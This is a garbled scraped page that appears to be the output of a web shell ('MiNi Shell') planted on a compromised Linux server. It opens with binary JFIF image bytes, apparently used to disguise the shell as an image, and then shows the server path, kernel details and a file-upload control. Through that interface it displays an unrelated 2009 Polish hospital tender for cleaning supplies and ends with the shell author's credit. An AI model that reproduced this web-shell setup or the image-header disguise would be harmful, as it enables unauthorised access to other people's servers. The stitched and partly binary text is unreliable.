JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /proc/thread-self/root/home/vmanager/www/common/web/tenders/20090507/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //proc/thread-self/root/home/vmanager/www/common/web/tenders/20090507/137226-N-2009.html

<p class="kh_header"><b>Ciechocinek: Środki czystości</b><br>
<b>Numer ogłoszenia: 137226 - 2009; data zamieszczenia: 07.05.2009</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> 22 Wojskowy Szpital Uzdrowiskowo-Rehabilitacyjny SP ZOZ , ul. Wojska Polskiego 5, 87-720 Ciechocinek, woj. kujawsko-pomorskie, tel. 054 28 332 11, faks 054 283 3211 w. 3202.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.22wszur.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Samodzielny publiczny zakład opieki zdrowotnej.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Środki czystości.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest sukcesywna  dostawa  środków czystości tj. sprzętu gospodarczego , art. papierniczych , chemii gospodarczej , chemii basenowej oraz wyrobów włókienniczych wymienionych w zał. nr 2  do SIWZ NAZWA MATERIAŁU				ilość	jm szczotka ryżowa na kij - wkręcana PCV	45	szt szczotka ryżowa ręczna  PCV			60	szt szczotka uliczna - 500mm drewno		5	szt szczotka do zamiatania drewniana wkr.	50	szt trzonki do szczotek dr. wkręcane		55	szt szczotka zmiotka + szufelka PCV		30	kpl szczotka do butelek - duża			40	szt szczotka klozetowa z podstawką PCV	95	kpl ściągaczka do mycia szyb -z trzon. regul. 2m	25	szt stelaż do MOP-ów  40cm na kieszenie	20	szt kij aluminiowy do MOP-ów płaskich		25	szt komplet MOP (wiadro+mop sznurkowy z trzon.)zw	12	kpl ściągaczka do wody z posadzki - 50cm	20	szt rękawice lateksowe(M i S)			35000	szt rękawice gumowe - gospodarcze		500	par kosz na śmieci plastikowy z pokrywą 30l	68	szt gąbka do mycia naczyń- średnia z padem ścier.	620	szt druciki do mycia naczyń ( 3 szt.)		81	op mata łazienkowa - szerokości 70cm Simplex gr.5mm	120	mb zasłona prysznica wodoodporna 140x200 mat. pow.	65	szt końcówka MOP -sznurkowa średnia wkr.	120	szt kubek do napoi gorących- plastikowe		6000	szt kubek do napoi zimnych - plastikowe		7000	szt miska plastikowa - śred. 500mm		46	szt rozpylacz ręczny do płynów  z regulowaną koń. 0,5l	50	szt wiadro plastikowe 10l				28	szt kratka łązienkowa					50	szt worki do śmieci 35l o gr 0,025mm LDPE  nieb wyt.do 20kg	28200	szt worki do śmieci 35l o gr 0,030mm LDPE czerw. wyt.do 22kg	1500	szt worki do śmieci 120l o gr.0,035mm HDPE nieb wyt. do 26kg	6500	szt worki do śmieci 240l o gr 0,04mm LDPE nieb wyt do 30kg	300	szt worki do śmieci 60l o gr 0,03mm LDPE nieb wyt.do 22kg	6500	szt worki do śmieci 60l o gr 0,03mm LDPE czer. wyt.do 22kg	1000	szt worki do śmieci 160l o gr.0,04mm LDPE nieb wyt.do 28kg	5450	szt papier toaletowy-30 mb na rolce mak. jednowarst		.	24000	szt papier toaletowy miękki dwuwarstwowy-celul.- 30mb		6100	szt ręczniki papierowe Z-Z ziel. makul.a200				2820	szt ręcznik papierowy na roli biały 2rolx48list.)kuch.			350	op ręcznik z celulozy do solarium- czyściwo nie pylący		10	op worki do odkurzaczy - zelmera						50	szt filtry do odkurzaczy - Zelmer				300	szt worki do odkurzaczy - laver				300	szt filtry do odkurzaczy - laver				30	szt płyn dezynfekujący -typu domestos 0,5l		2910	szt płyn dezynfekujący typu  Forte 0,5l			2010	szt płyn na  kamień rdzę do wc w płynie 0,5l typu cilit	2410	szt mleczko typu cif 0,5l					520	szt mydło w płynie - różne zapachy (5l)			420	l płyn do mycia płytek, holi, klatek sch.typuAjax 0,5l	1516	l płyn do mycia mebli 0,5ltypu Pronto		175	szt dezodorant do pomieszczeń(zapach) 			533	l płyn do mycia szyb i luster typu klin 0,5l		340	l płyn do mycia naczyń 5l	2390	l płyn do prania dywanów typu  Wanich 0,5l	20	szt pasta do podłóg samopoł. antypośl.typu Sidolux 0,5l	100	szt pasta do podłóg samopoł. -paneli typu Sidolux 0,5l	490	szt odkamieniacz do dzbanków					20	szt pasta do urządzeń sanitarnych typu Sama0,250g		330	szt płyn myjąco-dezynfekcyjny -typu  Goliat 5l		300	l mydło antybakteryjne do mycia  rąk -1l			560	l płyn do mycia naczyń w zmyw.na bazie chloru 		 do bardzo twardej wody typu neodisher			150	kg płyn do mycia powierzchni roboczych - CAROFARM AKT	100	l płyn do mycia naczyń w zmyw.bez chlorowy do 		 mycia szkła i sztućców typu neodisher			150	kg środek do namaczania sztućców typu neodisher	 środek myjąco-dezynfekcyjny dla gastronomi		 spektrum działania- grzyby, bakterie dozowanie za		 pomocą urządzeń dozujących-NEOQUAT S		100	l nabłyszczacz do naczyń						300	l odkamieniacz							370	l środek do czyszczenia gryla					60	l nabłyszczacz do urządzeń ze stali nierdzewnej		80	l odkamieniacz do usuwania kamien. kotł. typu remix	150	l pasta BHP do rąk 0,5 kg						100	kg krem do rąk z witaminami 75ml				536	szt pasta do obuwia 40g - czarna					100	szt pisuarka do łazienek- kostka					810	op zapach do toalet - koszyczek					5640	szt zapach do toalet - krążek					300	szt zmywacz do podłog typu Sidolux 0,5l			360 	szt
mydło toaletowe- 100g						900	szt środek do udrażniania rur kanalizacyjnych 500g		130	szt odświeżacz powietrza bris					187	szt Odświeżacz powietrza PUR					60	szt mydło hotelowe 2dkg						2000	szt kwas siarkowy 37% - płynny roztwór	1			2000	l podchloryn sodu do 16%chloru stabilizowany		12000	l środek do czyszczenia plaży					500	l środek  do czyszczenia linii wodnej				500	l koagulant								1500	l środek przeciw glonom						600	l ścierka do podłóg biała						240	szt ścierka domowa (3szt)						550	op końcówka MOP - sznurkowa średnia wkr.			190	szt końcówka MOP - ścierki z kieszeniami 40cm		210	szt Zamawiający wyraża zgodę na składanie ofert częściowych w pełnych pakietach..</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 17.20.00.00-4, 21.20.00.00-5, 24.10.00.00-5, 24.50.00.00-9, 36.60.00.00-7.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 8.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 12.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
</p><b>Informacja na temat wadium:</b> Nie dotyczy<br><p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> 1. O udzielenie zamówienie mogą ubiegać się wykonawcy potwierdzający spełnienie warunków: 1.1 Posiadający uprawnienia do wykonywania określonej działalności lub czynności, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień; 1.2 Posiadający niezbędna wiedzę i doświadczenie oraz dysponujący potencjałem technicznym i osobami zdolnymi do wykonania zamówienia; lub którzy przedstawią pisemne zobowiązanie innych podmiotów do udostępnienia potencjału technicznego i osób zdolnych do wykonania zamówienia. 1.3 Znajdujący się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówienia; 1.4 Nie podlegający wykluczeniu z postępowania o udzielenie zamówienia. 2. Z ubiegania się o zamówienia publicznego wyklucza się wykonawców, którzy: 2.1 nie spełniają warunków udziału w postępowaniu o zamówienie publiczne z art. 22 Prawa zamówień publicznych opisanych w ppkt. 1.1 do 1.4. 2.2 podlegają  wykluczeniu z postępowania na podstawie art. 24 ust. 1 i 2 Prawa zamówień publicznych. 3. Ocena spełnienia warunków udziału w postępowaniu nastąpi na podstawie złożonych przez wykonawców dokumentów. 3. Zamawiający odrzuca ofertę jeżeli: 3.1 jest niezgodną z ustawą 3.2 jej treść nie odpowiada treści specyfikacji istotnych warunków zamówienia, z zastrzeżeniem art. 87 ust. 2 pkt. 3 Prawa zamówień publicznych. 3.3 jej złożenie stanowi czyn nieuczciwej konkurencji w rozumieniu przepisów o zwalczaniu nieuczciwej konkurencji  3.4 zawiera rażąco niską cenę w stosunku do przedmiotu zamówienia,   3.5 została złożona przez wykonawcę wykluczonego z udziału w postępowaniu o udzielenie zamówienia. 3.6 zawiera błędy w obliczeniu ceny  3.7 wykonawca w terminie 3 dni od dnia doręczenia zawiadomienia nie zgodził się na poprawienie omyłki, o której mowa w art. 87 ust. 2 pkt. 3 Prawa zamówień publicznych  3.8 jest nieważna na podstawie odrębnych przepisów,  4. Ofertę wykonawcy wykluczonego uznaje się za odrzuconą 5. Ocena spełnienia warunków udziału w postępowaniu dokonywana będzie w oparciu o dokumenty złożone przez wykonawcę w niniejszym postępowaniu metodą warunku granicznego - spełnia-niespełna..</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> A. Na ofertę składają się następujące dokumenty i załączniki:  [x]   A.1) Formularz ofertowy - wypełniony i podpisany przez wykonawcę   [x]   A.2) Formularz cenowy - wypełniony i podpisany przez wykonawcę   [x]   A.3)  [o]   Projekt umowy   B. W celu potwierdzenia, że wykonawca posiada uprawnienie do wykonywania określonej działalności lub czynności oraz nie podlega wykluczeniu na podstawie art. 24 Prawa zamówień publicznych składa następujące dokumenty:  [x]   B.1) Aktualny odpis z właściwego rejestru albo aktualne zaświadczenie o wpisie do ewidencji działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub zgłoszenia do ewidencji działalności gospodarczej, wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert.    [x]   B.2) Dokumenty potwierdzające posiadanie uprawnień/pełnomocnictw osób składających ofertę, o ile nie wynika to z przedstawionych dokumentów rejestrowych.    [x]   B.3) Aktualne zaświadczenie właściwego naczelnika urzędu skarbowego oraz właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające odpowiednio, że wykonawca nie zalega z opłacaniem podatków, opłat oraz składek na ubezpieczenie zdrowotne i społeczne, lub zaświadczenia, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania ofert.    [x]   C.W celu potwierdzenia spełnienia warunku posiadania przez wykonawcę niezbędnej wiedzy i doświadczenia oraz dysponowania potencjałem technicznym i osobami zdolnymi do wykonania zamówienia należy złożyć następujące dokumenty: nie dotyczy   [x]   D.W celu potwierdzenia spełnienia warunku znajdowania się przez wykonawcę w sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówienia należy złożyć następujące dokumenty:   [x]   D.3) Polisa, a w przypadku jej braku innego dokumentu potwierdzającego, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności.   E. Wykonawca zamieszkały poza terytorium Rzeczypospolitej Polskiej:  [x]   E.1) Zamiast dokumentów, o których mowa w pkt. B.1) i B.3) składa dokument lub dokumenty, wystawione w kraju, w którym ma siedzibę lub miejsce zamieszkania, potwierdzające odpowiednio, że: 1) nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert. 2) nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania ofert. c) nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert.   [x]   Jeżeli w kraju pochodzenia osoby lub w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się dokumentów wskazanych w niniejszym pkt. E zastępuje się je dokumentem zawierającym oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio kraju pochodzenia osoby lub kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania - wystawionych nie wcześniej niż w terminach określonych w niniejszym pkt. E.    F. Dokumenty wymagane w przypadku składania oferty wspólnej:  F.1 Wykonawcy mogą wspólnie ubiegać się o udzielenie zamówienia, w takim przypadku dla ustanowionego pełnomocnika do oferty należy załączyć pełnomocnictwo do reprezentowania w postępowaniu lub do reprezentowania w postępowaniu i zawarcia umowy  [x]   - Oferta winna zawierać: oświadczenia i dokumenty opisane w pkt. B.1 i B.3 dla każdego partnera z osobna, pozostałe dokumenty składane są wspólnie      [x]   G. W celu potwierdzenia, że oferowane dostawy odpowiadają wymaganiom określonym w niniejszej specyfikacji istotnych warunków zamówienia do oferty należy dołączyć następujące dokumenty:   [x]   G.1) próbek - -próbki oferowanych środków  z pakietu nr  5  z poz. 1 , 2, 3, 4, 5, 6, 8, 9, 10, 11, 12, 13, 15 , 16, 17, 19, 21, 25 w  najmniejszych posiadanych opakowaniach . Próbki należy dostarczyć wraz z ofertą wyszczególnione w dostarczonej z próbkami  specyfikacji oznaczającymi pozycje w pakiecie ,   z nazwą firmy dostarczającej  , w opakowaniu zamkniętym.    H. Postanowienia dotyczące składanych dokumentów H.1 Wyżej wymienione dokumenty mogą być złożone w formie oryginałów lub kserokopii potwierdzonych za zgodność przez Wykonawcę lub osobę - osoby uprawnione do podpisania oferty z dopiskiem za zgodność z oryginałem. H.2 Dokumenty sporządzone w języku obcym są składane wraz z tłumaczeniem na język polski, poświadczonym przez wykonawcę.</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> www.22wszur.pl.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> 22 Wojskowy Szpital uzdrowiskowo Rehabilitacyjny SP ZOZ , ul. Wojska Polskiego 5 , 87-720 Ciechocinek.</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 18.05.2009 godzina 09:00, miejsce: 22 Wojskowy Szpital uzdrowiskowo Rehabilitacyjny SP ZOZ , ul. Wojska Polskiego 5 , 87-720 Ciechocinek- pokój nr 13 administracja szpitala (wyłącznie).</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Oferty mogą być składane  na poszczególne pakiety nr 1,2,3,4,6,7,8.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> zgodnie z załacznikiem nr 2 do SIWZ.</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 17.20.00.00-4, 21.20.00.00-5, 24.10.00.00-5, 36.60.00.00-7.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> pakiet nr 5.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> zgodnie z wyszczególnieniem w zał. nr 2 do SIWZ.</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 24.50.00.00-9.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li>
<li><b>4) Kryteria oceny ofert:</b>cena oraz dodatkowe kryteria i ich znaczenie:</p>
<ul class="kh_indent_1">
<li>1. Cena - 70</li>
<li>2. Jakość - 30</li>
</ul>
</li>
</ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com